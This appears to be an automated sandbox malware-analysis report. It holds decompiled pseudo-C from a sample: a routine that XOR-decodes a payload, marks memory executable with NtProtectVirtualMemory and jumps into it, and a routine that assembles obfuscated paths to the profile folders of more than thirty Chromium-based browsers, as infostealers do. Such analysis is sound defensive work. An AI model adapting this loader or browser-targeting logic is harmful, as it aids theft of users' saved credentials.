                  0x011413c6
                  0x011413cc
                  0x011413d2
                  0x011413d9
                  0x011413dc
                  0x011413e3
                  0x011413ea
                  0x011413f0
                  0x011413f8
                  0x01141402
                  0x0114140a
                  0x01141412
                  0x0114141e
                  0x01141429
                  0x01141431
                  0x01141436
                  0x0114143b
                  0x01141442
                  0x01141447
                  0x0114144a
                  0x0114144f
                  0x01141459
                  0x0114145c
                  0x01141466
                  0x0114146b
                  0x0114146f
                  0x01141478
                  0x0114147f
                  0x01141486
                  0x0114148b
                  0x01141493
                  0x0114149a
                  0x011414a1
                  0x011414a9
                  0x011414af
                  0x011414b5
                  0x011414ba
                  0x011414cf
                  0x011414d9
                  0x011414e0
                  0x011414e5
                  0x011414f0
                  0x011414f3
                  0x011414f9
                  0x011414ff
                  0x00000000
                  0x00000000
                  0x01141511
                  0x01141518
                  0x00000000
                  0x0114151a
                  0x0114151a
                  0x0114151a
                  0x0114151d
                  0x0114152d
                  0x01141534
                  0x0114153b
                  0x0114153d
                  0x01141544
                  0x0114154b
                  0x01141552
                  0x01141559
                  0x0114156a
                  0x01141572
                  0x01141578
                  0x01141584
                  0x01141584
                  0x01141585
                  0x01141588
                  0x00000000

                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0114153B
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 95698347a203cdd392f88141b009f174b4dc41bcb4a7bfbcd84c51c2d6bca374
                  • Instruction ID: 3f736185787b5484694d3cbad46a7fe30203c885e76e7e42167121dd815fd896
                  • Opcode Fuzzy Hash: 95698347a203cdd392f88141b009f174b4dc41bcb4a7bfbcd84c51c2d6bca374
                  • Instruction Fuzzy Hash: D18103B1C1079DAADF50CFE4DC81AEEBB74BF59300F24421AE904B7251EBB466858B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 26 11414e9 27 11414f0-11414ff 26->27 28 1141511-1141518 27->28 29 1141501-1141504 27->29 28->27 31 114151a 28->31 29->28 30 1141506-1141509 29->30 30->28 33 114150b-114150f 30->33 32 114151d-114156a NtProtectVirtualMemory call 11416b0 31->32 36 114156f-1141584 32->36 33->28 35 1141585-114158b 33->35 35->32
                  C-Code - Quality: 58%
                  			E011414E9(void* __eax, void* __ebx, void* __ecx) {
                  				void* _t25;
                  				void* _t35;
                  				void* _t37;
                  				signed int _t39;
                  				void* _t41;
                  				void* _t43;
                  
                  				_t37 = __ecx;
                  				_t35 = __ebx;
                  				_t25 = __eax;
                  				while(1) {
                  					_t39 =  *(_t37 + _t25) ^ 0x17cf51d6;
                  					 *(_t43 - 0x74) = _t39;
                  					if(_t39 == 0xc9 && _t39 == 0xb3 &&  *((intOrPtr*)(_t43 - 0x72)) == _t39 &&  *((char*)(_t43 - 0x71)) == 0xc7) {
                  						break;
                  					}
                  					_t37 = _t37 + 1;
                  					if(_t37 < 0x4000) {
                  						continue;
                  					} else {
                  						_t41 =  *(_t43 - 0x44);
                  					}
                  					L7:
                  					 *(_t43 - 0x78) = 0;
                  					 *(_t43 - 0x7c) = 0x2ca00;
                  					NtProtectVirtualMemory(0xffffffff, _t43 - 0x44, _t43 - 0x7c, 0x40, _t43 - 0x78); // executed
                  					 *(_t43 - 0x40) =  *(_t43 - 0x40) ^ 0x17cf51d6;
                  					 *(_t43 - 0x3c) =  *(_t43 - 0x3c) ^ 0x17cf51d6;
                  					 *(_t43 - 0x38) =  *(_t43 - 0x38) ^ 0x17cf51d6;
                  					 *(_t43 - 0x34) =  *(_t43 - 0x34) ^ 0x17cf51d6;
                  					 *(_t43 - 0x30) =  *(_t43 - 0x30) ^ 0x17cf51d6;
                  					E011416B0(_t35, _t41, 0x2ca00, _t43 - 0x40); // executed
                  					_t22 = _t41 + 0x21760; // 0x21760
                  					 *_t22();
                  					return 0;
                  				}
                  				_t41 = _t37 + _t25;
                  				 *(_t43 - 0x44) = _t41;
                  				goto L7;
                  			}









                  0x011414e9
                  0x011414e9
                  0x011414e9
                  0x011414f0
                  0x011414f3
                  0x011414f9
                  0x011414ff
                  0x00000000
                  0x00000000
                  0x01141511
                  0x01141518
                  0x00000000
                  0x0114151a
                  0x0114151a
                  0x0114151a
                  0x0114151d
                  0x0114152d
                  0x01141534
                  0x0114153b
                  0x0114153d
                  0x01141544
                  0x0114154b
                  0x01141552
                  0x01141559
                  0x0114156a
                  0x01141572
                  0x01141578
                  0x01141584
                  0x01141584
                  0x01141585
                  0x01141588
                  0x00000000

                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0114153B
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: ad54def11ce724fa2658c867b4fd5dea19d6f8a8ceec973942de66c2b6f0cd91
                  • Instruction ID: d228cab0cb1a578c338f61e9dace1940d7407e459adc66f8b9bebed14370d531
                  • Opcode Fuzzy Hash: ad54def11ce724fa2658c867b4fd5dea19d6f8a8ceec973942de66c2b6f0cd91
                  • Instruction Fuzzy Hash: 041130B1C0865C6BEF68CAB4EC81ADEBB74FB01624F74425DDA22A7192D37125458F81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0114FE87(void* __ebx, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				char _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				char _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				char _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				char _v52;
                  				short _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				char _v68;
                  				short _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				char _v84;
                  				short _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				char _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				char _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				char _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				char _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				char _v164;
                  				short _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				char _v184;
                  				short _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				char _v204;
                  				short _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				char _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				char _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				char _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				char _v284;
                  				intOrPtr _v288;
                  				char _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				char _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				char _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				char _v372;
                  				short _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				char _v404;
                  				short _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				char _v436;
                  				short _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				char _v468;
                  				short _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				char _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				char _v532;
                  				short _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				char _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				char _v568;
                  				short _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				char _v604;
                  				short _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				char _v640;
                  				short _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				char _v684;
                  				short _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				char _v728;
                  				short _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				char _v772;
                  				short _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				char _v808;
                  				intOrPtr _v812;
                  				char _v816;
                  				short _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				char _v864;
                  				short _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				char _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				char _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				char _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				char _v1084;
                  				char _v1126;
                  				short _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				char _v1148;
                  				void* __esi;
                  				signed int _t496;
                  				signed int _t509;
                  				signed int _t510;
                  				signed int _t643;
                  				intOrPtr _t766;
                  				intOrPtr _t767;
                  
                  				_t766 = _a4;
                  				_t767 =  *((intOrPtr*)(_t766 + 0xb8c));
                  				if(_t767 != 0) {
                  					E0115FAA7(_t767, 0x18b4);
                  					_t496 = E0115C2E7(_t766, 0x16);
                  					 *(_t767 + 0x18b0) = _t496;
                  					__eflags = _t496;
                  					if(_t496 == 0) {
                  						goto L1;
                  					} else {
                  						_v1148 = 0x55005c;
                  						_v1144 = 0x650073;
                  						_v1140 = 0x200072;
                  						_v1136 = 0x610044;
                  						_v1132 = 0x610074;
                  						_v1128 = 0;
                  						E0115FAF7( &_v1126, 0, 0x2a);
                  						_t13 = E0115FC77( &_v1148) + 2; // 0x2
                  						E0115FA77(_t767 + 4,  &_v1148, _t500 + _t13);
                  						_t647 = _t767 + 0x14a0;
                  						E0114C667(_t767 + 0x14a0, _t767, __eflags, _t766, _t767 + 0x14a0, 3, 0);
                  						E0114C667(_t767 + 0x14a0, _t767, __eflags, _t766, _t767 + 0x16a8, 1, 0);
                  						 *(_t767 + 0x1498) = E0115FC77(_t647);
                  						 *(_t767 + 0x149c) = E0115FC77(_t767 + 0x16a8);
                  						_t509 =  *(_t767 + 0x1498);
                  						__eflags = _t509;
                  						if(_t509 != 0) {
                  							__eflags =  *((short*)(_t767 + 0x149e + _t509 * 2)) - 0x5c;
                  							if( *((short*)(_t767 + 0x149e + _t509 * 2)) != 0x5c) {
                  								 *((short*)(_t767 + 0x14a0 + _t509 * 2)) = 0x5c;
                  								_t28 = _t767 + 0x1498;
                  								 *_t28 =  *(_t767 + 0x1498) + 1;
                  								__eflags =  *_t28;
                  							}
                  						}
                  						_t510 =  *(_t767 + 0x149c);
                  						__eflags = _t510;
                  						if(_t510 != 0) {
                  							__eflags =  *((short*)(_t767 + 0x16a6 + _t510 * 2)) - 0x5c;
                  							if( *((short*)(_t767 + 0x16a6 + _t510 * 2)) != 0x5c) {
                  								 *((short*)(_t767 + 0x16a8 + _t510 * 2)) = 0x5c;
                  								_t37 = _t767 + 0x149c;
                  								 *_t37 =  *(_t767 + 0x149c) + 1;
                  								__eflags =  *_t37;
                  							}
                  						}
                  						_v292 = 0x560041;
                  						_v288 = 0x5c0047;
                  						_v284 = 0x720042;
                  						_v280 = 0x77006f;
                  						_v276 = 0x650073;
                  						_v272 = 0x72;
                  						_t47 = E0115FC77( &_v292) + 2; // 0x2
                  						E0115FA77(_t767 + 0x4d8,  &_v292, _t512 + _t47);
                  						_v28 = 0x69004b;
                  						_v24 = 0x7a006e;
                  						_v20 = 0x61;
                  						_t55 = E0115FC77( &_v28) + 2; // 0x2
                  						E0115FA77(_t767 + 0x518,  &_v28, _t515 + _t55);
                  						_v244 = 0x520055;
                  						_v240 = 0x720042;
                  						_v236 = 0x77006f;
                  						_v232 = 0x650073;
                  						_v228 = 0x72;
                  						_t65 = E0115FC77( &_v244) + 2; // 0x2
                  						E0115FA77(_t767 + 0x558,  &_v244, _t519 + _t65);
                  						_v912 = 0x560041;
                  						_v908 = 0x530041;
                  						_v904 = 0x200054;
                  						_v900 = 0x6f0053;
                  						_v896 = 0x740066;
                  						_v892 = 0x610077;
                  						_v888 = 0x650072;
                  						_v884 = 0x42005c;
                  						_v880 = 0x6f0072;
                  						_v876 = 0x730077;
                  						_v872 = 0x720065;
                  						_v868 = 0;
                  						_t82 = E0115FC77( &_v912) + 2; // 0x2
                  						E0115FA77(_t767 + 0x598,  &_v912, _t523 + _t82);
                  						_v204 = 0x610053;
                  						_v200 = 0x61006c;
                  						_v196 = 0x57006d;
                  						_v192 = 0x620065;
                  						_v188 = 0;
                  						_t92 = E0115FC77( &_v204) + 2; // 0x2
                  						E0115FA77(_t767 + 0x5d8,  &_v204, _t527 + _t92);
                  						_v604 = 0x430043;
                  						_v600 = 0x65006c;
                  						_v596 = 0x6e0061;
                  						_v592 = 0x720065;
                  						_v588 = 0x420020;
                  						_v584 = 0x6f0072;
                  						_v580 = 0x730077;
                  						_v576 = 0x720065;
                  						_v572 = 0;
                  						_t106 = E0115FC77( &_v604) + 2; // 0x2
                  						E0115FA77(_t767 + 0x618,  &_v604, _t531 + _t106);
                  						_v500 = 0x70004f;
                  						_v496 = 0x720065;
                  						_v492 = 0x200061;
                  						_v488 = 0x6f0053;
                  						_v484 = 0x740066;
                  						_v480 = 0x610077;
                  						_v476 = 0x650072;
                  						_v472 = 0;
                  						E0115FA77(_t767 + 0x658,  &_v500, E0115FC77( &_v500) + _t534 + 2);
                  						_v684 = 0x610059;
                  						_v680 = 0x64006e;
                  						_v676 = 0x780065;
                  						_v672 = 0x59005c;
                  						_v668 = 0x6e0061;
                  						_v664 = 0x650064;
                  						_v660 = 0x420078;
                  						_v656 = 0x6f0072;
                  						_v652 = 0x730077;
                  						_v648 = 0x720065;
                  						_v644 = 0;
                  						_t135 = E0115FC77( &_v684) + 2; // 0x2
                  						E0115FA77(_t767 + 0x698,  &_v684, _t538 + _t135);
                  						_v148 = 0x6c0053;
                  						_v144 = 0x6d0069;
                  						_v140 = 0x65006a;
                  						_v136 = 0x74;
                  						_t144 = E0115FC77( &_v148) + 2; // 0x2
                  						E0115FA77(_t767 + 0x6d8,  &_v148, _t542 + _t144);
                  						_v568 = 0x360033;
                  						_v564 = 0x430030;
                  						_v560 = 0x720068;
                  						_v556 = 0x6d006f;
                  						_v552 = 0x5c0065;
                  						_v548 = 0x680043;
                  						_v544 = 0x6f0072;
                  						_v540 = 0x65006d;
                  						_v536 = 0;
                  						_t158 = E0115FC77( &_v568) + 2; // 0x2
                  						E0115FA77(_t767 + 0x718,  &_v568, _t546 + _t158);
                  						_v344 = 0x6f0043;
                  						_v340 = 0x6f006d;
                  						_v336 = 0x6f0064;
                  						_v332 = 0x44005c;
                  						_v328 = 0x610072;
                  						_v324 = 0x6f0067;
                  						_v320 = 0x6e;
                  						_t170 = E0115FC77( &_v344) + 2; // 0x2
                  						E0115FA77(_t767 + 0x758,  &_v344, _t550 + _t170);
                  						_v864 = 0x61004d;
                  						_v860 = 0x6c0070;
                  						_v856 = 0x530065;
                  						_v852 = 0x750074;
                  						_v848 = 0x690064;
                  						_v844 = 0x5c006f;
                  						_v840 = 0x680043;
                  						_v836 = 0x6f0072;
                  						_v832 = 0x65006d;
                  						_v828 = 0x6c0050;
                  						_v824 = 0x730075;
                  						_v820 = 0;
                  						_t187 = E0115FC77( &_v864) + 2; // 0x2
                  						E0115FA77(_t767 + 0x798,  &_v864, _t554 + _t187);
                  						_v184 = 0x680043;
                  						_v180 = 0x6f0072;
                  						_v176 = 0x69006d;
                  						_v172 = 0x6d0075;
                  						_v168 = 0;
                  						_t197 = E0115FC77( &_v184) + 2; // 0x2
                  						E0115FA77(_t767 + 0x7d8,  &_v184, _t558 + _t197);
                  						_v52 = 0x6f0054;
                  						_v48 = 0x630072;
                  						_v44 = 0x68;
                  						E0115FA77(_t767 + 0x818,  &_v52, E0115FC77( &_v52) + _t561 + 2);
                  						_v1020 = 0x720042;
                  						_v1016 = 0x760061;
                  						_v1012 = 0x530065;
                  						_v1008 = 0x66006f;
                  						_v1004 = 0x770074;
                  						_v1000 = 0x720061;
                  						_v996 = 0x5c0065;
                  						_v992 = 0x720042;
                  						_v988 = 0x760061;
                  						_v984 = 0x2d0065;
                  						_v980 = 0x720042;
                  						_v976 = 0x77006f;
                  						_v972 = 0x650073;
                  						_v968 = 0x72;
                  						_t224 = E0115FC77( &_v1020) + 2; // 0x2
                  						E0115FA77(_t767 + 0x858,  &_v1020, _t564 + _t224);
                  						_v116 = 0x720049;
                  						_v112 = 0x640069;
                  						_v108 = 0x750069;
                  						_v104 = 0x6d;
                  						_t233 = E0115FC77( &_v116) + 2; // 0x2
                  						E0115FA77(_t767 + 0x898,  &_v116, _t567 + _t233);
                  						_v964 = 0x70004f;
                  						_v960 = 0x720065;
                  						_v956 = 0x200061;
                  						_v952 = 0x6f0053;
                  						_v948 = 0x740066;
                  						_v944 = 0x610077;
                  						_v940 = 0x650072;
                  						_v936 = 0x4f005c;
                  						_v932 = 0x650070;
                  						_v928 = 0x610072;
                  						_v924 = 0x4e0020;
                  						_v920 = 0x6f0065;
                  						_v916 = 0x6e;
                  						_t251 = E0115FC77( &_v964) + 2; // 0x2
                  						E0115FA77(_t767 + 0x8d8,  &_v964, _t570 + _t251);
                  						_v268 = 0x530037;
                  						_v264 = 0x610074;
                  						_v260 = 0x5c0072;
                  						_v256 = 0x530037;
                  						_v252 = 0x610074;
                  						_v248 = 0x72;
                  						E0115FA77(_t767 + 0x918,  &_v268, E0115FC77( &_v268) + _t573 + 2);
                  						_v40 = 0x6d0041;
                  						_v36 = 0x670069;
                  						_v32 = 0x6f;
                  						_t270 = E0115FC77( &_v40) + 2; // 0x2
                  						E0115FA77(_t767 + 0x958,  &_v40, _t577 + _t270);
                  						_v16 = 0x6c0042;
                  						_v12 = 0x730069;
                  						_v8 = 0x6b;
                  						_t278 = E0115FC77( &_v16) + 2; // 0x2
                  						E0115FA77(_t767 + 0x998,  &_v16, _t580 + _t278);
                  						_v316 = 0x650043;
                  						_v312 = 0x74006e;
                  						_v308 = 0x720042;
                  						_v304 = 0x77006f;
                  						_v300 = 0x650073;
                  						_v296 = 0x72;
                  						E0115FA77(_t767 + 0x9d8,  &_v316, E0115FC77( &_v316) + _t583 + 2);
                  						_v68 = 0x680043;
                  						_v64 = 0x640065;
                  						_v60 = 0x74006f;
                  						_v56 = 0;
                  						_t298 = E0115FC77( &_v68) + 2; // 0x2
                  						E0115FA77(_t767 + 0xa18,  &_v68, _t587 + _t298);
                  						_v468 = 0x6f0043;
                  						_v464 = 0x430063;
                  						_v460 = 0x63006f;
                  						_v456 = 0x42005c;
                  						_v452 = 0x6f0072;
                  						_v448 = 0x730077;
                  						_v444 = 0x720065;
                  						_v440 = 0;
                  						E0115FA77(_t767 + 0xa58,  &_v468, E0115FC77( &_v468) + _t590 + 2);
                  						_v640 = 0x6c0045;
                  						_v636 = 0x6d0065;
                  						_v632 = 0x6e0065;
                  						_v628 = 0x730074;
                  						_v624 = 0x420020;
                  						_v620 = 0x6f0072;
                  						_v616 = 0x730077;
                  						_v612 = 0x720065;
                  						_v608 = 0;
                  						E0115FA77(_t767 + 0xa98,  &_v640, E0115FC77( &_v640) + _t593 + 2);
                  						_v772 = 0x700045;
                  						_v768 = 0x630069;
                  						_v764 = 0x500020;
                  						_v760 = 0x690072;
                  						_v756 = 0x610076;
                  						_v752 = 0x790063;
                  						_v748 = 0x420020;
                  						_v744 = 0x6f0072;
                  						_v740 = 0x730077;
                  						_v736 = 0x720065;
                  						_v732 = 0;
                  						_t341 = E0115FC77( &_v772) + 2; // 0x2
                  						E0115FA77(_t767 + 0xad8,  &_v772, _t597 + _t341);
                  						_v84 = 0x6f004b;
                  						_v80 = 0x65006d;
                  						_v76 = 0x610074;
                  						_v72 = 0;
                  						E0115FA77(_t767 + 0xb18,  &_v84, E0115FC77( &_v84) + _t600 + 2);
                  						_v132 = 0x72004f;
                  						_v128 = 0x690062;
                  						_v124 = 0x750074;
                  						_v120 = 0x6d;
                  						E0115FA77(_t767 + 0xb58,  &_v132, E0115FC77( &_v132) + _t603 + 2);
                  						_v532 = 0x700053;
                  						_v528 = 0x740075;
                  						_v524 = 0x69006e;
                  						_v520 = 0x5c006b;
                  						_v516 = 0x700053;
                  						_v512 = 0x740075;
                  						_v508 = 0x69006e;
                  						_v504 = 0x6b;
                  						_t372 = E0115FC77( &_v532) + 2; // 0x2
                  						E0115FA77(_t767 + 0xb98,  &_v532, _t606 + _t372);
                  						_v436 = 0x430075;
                  						_v432 = 0x7a006f;
                  						_v428 = 0x65004d;
                  						_v424 = 0x690064;
                  						_v420 = 0x5c0061;
                  						_v416 = 0x720055;
                  						_v412 = 0x6e0061;
                  						_v408 = 0;
                  						E0115FA77(_t767 + 0xbd8,  &_v436, E0115FC77( &_v436) + _t609 + 2);
                  						_v728 = 0x650046;
                  						_v724 = 0x72006e;
                  						_v720 = 0x720069;
                  						_v716 = 0x490020;
                  						_v712 = 0x63006e;
                  						_v708 = 0x53005c;
                  						_v704 = 0x65006c;
                  						_v700 = 0x700069;
                  						_v696 = 0x69006e;
                  						_v692 = 0x350072;
                  						_v688 = 0;
                  						_t401 = E0115FC77( &_v728) + 2; // 0x2
                  						E0115FA77(_t767 + 0xc18,  &_v728, _t613 + _t401);
                  						_v816 = 0x610043;
                  						_v812 = 0x610074;
                  						_v808 = 0x69006c;
                  						_v804 = 0x61006e;
                  						_v800 = 0x720047;
                  						_v796 = 0x75006f;
                  						_v792 = 0x5c0070;
                  						_v788 = 0x690043;
                  						_v784 = 0x720074;
                  						_v780 = 0x6f0069;
                  						_v776 = 0;
                  						_t417 = E0115FC77( &_v816) + 2; // 0x2
                  						E0115FA77(_t767 + 0xc58,  &_v816, _t617 + _t417);
                  						_v372 = 0x6f0043;
                  						_v368 = 0x77006f;
                  						_v364 = 0x6e006f;
                  						_v360 = 0x43005c;
                  						_v356 = 0x6f006f;
                  						_v352 = 0x6f0077;
                  						_v348 = 0x6e;
                  						_t429 = E0115FC77( &_v372) + 2; // 0x2
                  						E0115FA77(_t767 + 0xc98,  &_v372, _t620 + _t429);
                  						_v100 = 0x69006c;
                  						_v96 = 0x620065;
                  						_v92 = 0x6f0061;
                  						_v88 = 0;
                  						_t438 = E0115FC77( &_v100) + 2; // 0x2
                  						E0115FA77(_t767 + 0xcd8,  &_v100, _t624 + _t438);
                  						_v224 = 0x490051;
                  						_v220 = 0x200050;
                  						_v216 = 0x750053;
                  						_v212 = 0x660072;
                  						_v208 = 0;
                  						_t448 = E0115FC77( &_v224) + 2; // 0x2
                  						E0115FA77(_t767 + 0xd18,  &_v224, _t628 + _t448);
                  						_v404 = 0x69004d;
                  						_v400 = 0x720063;
                  						_v396 = 0x73006f;
                  						_v392 = 0x66006f;
                  						_v388 = 0x5c0074;
                  						_v384 = 0x640045;
                  						_v380 = 0x650067;
                  						_v376 = 0;
                  						E0115FA77(_t767 + 0xd58,  &_v404, E0115FC77( &_v404) + _t631 + 2);
                  						_v164 = 0x690056;
                  						_v160 = 0x610076;
                  						_v156 = 0x64006c;
                  						_v152 = 0x69;
                  						E0115FA77(_t767 + 0xd98,  &_v164, E0115FC77( &_v164) + _t634 + 2);
                  						_v1084 = 0xa000d;
                  						_v1080 = 0x680043;
                  						_v1076 = 0x6f0072;
                  						_v1072 = 0x69006d;
                  						_v1068 = 0x6d0075;
                  						_v1064 = 0x520020;
                  						_v1040 = 0;
                  						_v1036 = 0;
                  						_v1032 = 0;
                  						_v1028 = 0;
                  						_v1024 = 0;
                  						_v1060 = 0x630065;
                  						_v1056 = 0x76006f;
                  						_v1052 = 0x720065;
                  						_v1048 = 0xd0079;
                  						_v1044 = 0xa;
                  						_t490 = E0115FC77( &_v1084) + 2; // 0x2
                  						E0115FA77( *((intOrPtr*)(_t766 + 0xa08)),  &_v1084, _t639 + _t490);
                  						_t643 = E0115FC77( *((intOrPtr*)(_t766 + 0xa08))) + _t642;
                  						__eflags = _t643;
                  						 *(_t766 + 0xa0c) = _t643;
                  						E0114F157(_t766, 9);
                  						return 1;
                  					}
                  				} else {
                  					L1:
                  					return 0;
                  				}
                  			}































































































































































































































































































                  0x0114fe92
                  0x0114fe95
                  0x0114fe9d
                  0x0114fead
                  0x0114feb5
                  0x0114febd
                  0x0114fec3
                  0x0114fec5
                  0x00000000
                  0x0114fec7
                  0x0114fed4
                  0x0114fede
                  0x0114fee8
                  0x0114fef2
                  0x0114fefc
                  0x0114ff06
                  0x0114ff0d
                  0x0114ff1e
                  0x0114ff2e
                  0x0114ff37
                  0x0114ff3f
                  0x0114ff50
                  0x0114ff5b
                  0x0114ff70
                  0x0114ff76
                  0x0114ff80
                  0x0114ff82
                  0x0114ff84
                  0x0114ff8d
                  0x0114ff94
                  0x0114ff9c
                  0x0114ff9c
                  0x0114ff9c
                  0x0114ff9c
                  0x0114ff8d
                  0x0114ffa2
                  0x0114ffa8
                  0x0114ffaa
                  0x0114ffac
                  0x0114ffb5
                  0x0114ffbc
                  0x0114ffc4
                  0x0114ffc4
                  0x0114ffc4
                  0x0114ffc4
                  0x0114ffb5
                  0x0114ffd1
                  0x0114ffdb
                  0x0114ffe5
                  0x0114ffef
                  0x0114fff9
                  0x01150003
                  0x01150012
                  0x01150025
